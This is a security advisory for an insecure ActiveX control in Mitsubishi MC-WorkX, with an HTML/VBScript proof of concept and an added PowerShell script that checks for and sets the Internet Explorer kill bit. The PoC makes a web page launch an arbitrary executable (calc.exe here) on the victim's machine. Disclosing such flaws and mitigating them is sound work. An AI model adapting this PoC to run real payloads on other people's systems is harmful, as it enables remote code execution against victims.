Mitsubishi MC-WorkX Suite Insecure ActiveX Control IcoLaunch.dll

2013.09.15
Credit: Blake
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor: http://www.meau.com
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->
<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbitrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>
<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>
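
Mitigation check, added here as an example and not part of the original advisory: the PoC header lists "Kill Bit: False", so the script below reports whether the Internet Explorer kill bit is set for the advisory's CLSID and, when run elevated with `-Apply`, sets it while preserving any existing flags. The `-Apply` switch is this script's own (hypothetical) name; the registry location and the 0x400 value are the standard IE ActiveX Compatibility mechanism.

```powershell
# Added example: audit / set the IE kill bit for the control in this advisory.
# -Apply is a switch defined by this script; without it nothing is changed.
param([switch]$Apply)

$Clsid   = '{C28A127E-4A85-11D3-A5FF-00A0249E352D}'  # CLSID from the advisory
$KillBit = 0x400                                     # kill-bit value in "Compatibility Flags"

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($root in $Roots) {
    if (-not (Test-Path $root)) { continue }         # view not present on this OS

    $key   = Join-Path $root $Clsid
    $flags = 0
    if (Test-Path $key) {
        $prop = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
    }
    $wasSet = ($flags -band $KillBit) -ne 0

    if ($Apply -and -not $wasSet) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the kill bit into the existing value so other flags survive.
        $flags = $flags -bor $KillBit
        New-ItemProperty -Path $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value $flags -Force | Out-Null
    }

    [pscustomobject]@{
        Key        = $key
        Flags      = '0x{0:X}' -f $flags
        KillBitSet = ($flags -band $KillBit) -ne 0
        Changed    = [bool]($Apply -and -not $wasSet)
    }
}
```

With the kill bit set, Internet Explorer refuses to instantiate the control from a web page; the DLL itself stays installed and usable by the local application.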

References:

http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000

